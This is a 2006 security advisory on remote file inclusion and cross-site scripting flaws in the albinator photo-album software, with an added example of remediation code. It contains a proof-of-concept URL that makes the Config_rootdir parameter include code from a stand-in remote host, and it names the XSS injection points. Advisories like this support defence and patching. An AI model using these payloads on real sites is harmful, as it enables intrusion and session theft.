by r0t,der4444,cembo,VietMafia

Wednesday, May 03, 2006

albinator <= 2.0.8 Remote File Inclusion & XSS vuln

###############################################
Vuln. discovered by: VietMafia & r0t (Pridels Sec Crew)
Date: 3 May 2006
Vendor: http://www.albinator.com/
Affected versions: 2.0.8 and prior
###############################################



Vuln. Description:


1. Remote File Inclusion Vuln.

Input passed to the "Config_rootdir" parameter in "eday.php", "eshow.php" and "forgot.php" isn't properly verified before it is used to include files. This can be exploited to include arbitrary files from external and local resources.


example code:

// $Config_rootdir is taken straight from request input (no validation),
// then used as the prefix of every include path below.
$dirpath = "$Config_rootdir";
require_once($dirpath."essential/dbc_essential.php");
require_once($dirpath."essential/globalfunctions.php");


This can lead to remote file inclusion.


example PoC:

http://victim/eshow.php?Config_rootdir=http://evilcode.php




2. Cross-Site Scripting Vuln.

Input passed to the "cid" parameter in dlisting.php and to the "preloadSlideShow" parameter in showpic.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.


examples:


/dlisting.php?cid=1[XSS]

/showpic.php?aid=21&uuid=175&pid=172&slide_show=1&slide_show_secs=0&preloadSlideShow=[XSS]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
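As an added example (not albinator's code, and not from the advisory authors), one way to apply that solution to the include and output code described above; it assumes the essential/ directory sits next to the script and that the hypothetical helper safe_app_path() is used for any include whose base directory must stay configurable:

```php
<?php
// Added example (not albinator's code): one way to implement the fix the
// advisory asks for. Assumes essential/ lives next to this script.

// 1. Remote file inclusion: never build an include path from request input.
//    The application root is derived from the script's own location, so a
//    Config_rootdir=http://... query parameter has no effect on it.
$dirpath = __DIR__ . '/';

// If a configurable base directory must be kept, resolve every include
// through a check that rejects URL schemes and paths leaving the root.
// (Hypothetical helper, not part of albinator.)
function safe_app_path(string $base, string $relative): string
{
    $baseReal = realpath($base);
    if ($baseReal === false) {
        throw new RuntimeException('application root not found');
    }
    // Reject anything that looks like a URL wrapper (http://, ftp://, php://)
    // or contains a NUL byte before the filesystem ever sees it.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $relative) === 1
        || strpos($relative, "\0") !== false) {
        throw new RuntimeException('refusing remote or malformed include path');
    }
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    $full = realpath($prefix . $relative);
    if ($full === false || strncmp($full, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('include path escapes application root');
    }
    return $full;
}

require_once safe_app_path($dirpath, 'essential/dbc_essential.php');
require_once safe_app_path($dirpath, 'essential/globalfunctions.php');

// 2. Cross-site scripting: cid is numeric, so cast it; preloadSlideShow is
//    free text, so HTML-encode it before it is echoed back into the page.
$cid = isset($_GET['cid']) ? (int) $_GET['cid'] : 0;
$preload = (isset($_GET['preloadSlideShow']) && is_string($_GET['preloadSlideShow']))
    ? $_GET['preloadSlideShow'] : '';

echo '<p>Category ' . $cid . '</p>';
echo '<input type="hidden" name="preloadSlideShow" value="'
    . htmlspecialchars($preload, ENT_QUOTES, 'UTF-8') . '">';
```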
More information @ unsecured-systems.com/forum/

Copyright (c) 2006 Pridels Sec Crew